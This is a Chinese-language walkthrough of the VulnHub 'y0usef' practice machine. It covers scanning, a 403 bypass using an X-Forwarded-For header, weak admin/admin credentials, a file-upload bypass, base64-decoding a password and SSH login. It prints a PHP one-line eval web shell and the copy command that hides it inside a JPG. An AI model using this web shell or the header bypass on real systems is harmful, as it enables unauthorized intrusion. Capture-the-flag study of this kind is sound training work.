[VulnHub] - y0usef靶场

靶机地址：https://download.vulnhub.com/y0usef/y0usef.ova
难度等级：低
打靶目标：取得 root 权限 + 2 Flag
使用工具：BurpsuitePro、arp-scan、dirb、
攻击机:192.168.56.106
靶机:192.168.56.113
攻击方法：
    主机发现
    端口扫描
    WEB信息收集
    指纹探测
    弱口令
    403 Bypass
    文件上传及绕过
        图片马
    base64编码
    本地提权

信息收集

通过本地arp-scan扫描发现地址为192.168.56.113 同时在nmap检测到80和22端口的开放从而进一步的进行目标探测，在使用目录扫描发现有个/adminstration目录为403的权限

200   （成功）  服务器已成功处理了请求。通常，这表示服务器提供了请求的网页。
204   （无内容）  服务器成功处理了请求，但没有返回任何内容。
301   （永久移动）  请求的网页已永久移动到新位置。服务器返回此响应（对 GET 或 HEAD 请求的响应）时，会自动将请求者转到新位置。
302   （临时移动）  服务器目前从不同位置的网页响应请求，但请求者应继续使用原有位置来进行以后的请求。
307   （临时重定向）  服务器目前从不同位置的网页响应请求，但请求者应继续使用原有位置来进行以后的请求。
401   （未授权）请求要求身份验证。对于需要登录的网页，服务器可能返回此响应。
403   （拒绝授权访问），常见原因包括权限配置问题、IP 地址被拒绝、文件或目录权限设置不当、需要认证的资源未提供正确凭证或访问空目录。

403 Bypass

解决方法包括检查和调整 .htaccess 或服务器配置文件、修改文件和目录权限、确认没有 IP 拒绝规则、提供正确的认证信息，以及确保目录不为空。通过伪装 User-Agent 或使用代理也可以绕过某些限制。

在访问/adminstration目录可尝试X-Forwarded-For: 127.0.0.1，页面显示正常，发现这个是一个用户名和密码登录的后台界面，尝试爆破，用户名和密码均为弱口令admin/admin,（注：在每个访问页面都需要添加X-Forwarded-For: 127.0.0.1）

文件上传绕过

在登录页面中发现可以文件上传，尝试制作图片马绕过，上传文件成功目录地址为:/adminstration/upload/files/,并且尝试蚁剑连接，

#制作图片马,任意选择一张jpg图片，shell.php写入一句话<?php @eval($_POST['shell']);?>
在终端下copy
copy 1.jpg/b + shell.php/a 2.jpg  

可以连接了

base64解密

得到的用户名和密码正好是我们信息收集到的ssh连接，

远程连接，本地提权

已经成功登录服务器

查看flag

总结

在信息收集的过程中发现了22端口和80端口，同时经过目录扫描，发现的目录为/adminstration，状态码为403，当我们使用X-Forwarded-For: 127.0.0.1，惊奇的发现这个是一个管理后台登录页面，同时我使用了暴力破解，得到的用户密码为弱口令admin/admin，登录进去，能从页面中获取到的是一个文件上传的路径，从而进行文件上传的尝试，图片马上传成功后最终能从服务器当中看到这个页面的上传地址，从而使用蚁剑进行连接，发现user.txt文本是一个base64机密的文件，通过解密后已得到了密码，同时发现，这个是22端口连接的用户名和密码，当我们切换用户的时候也是使用的yousef密码登录，惊奇的发现已经登录进来了，也看到了作者留下的信息，至此，打靶结束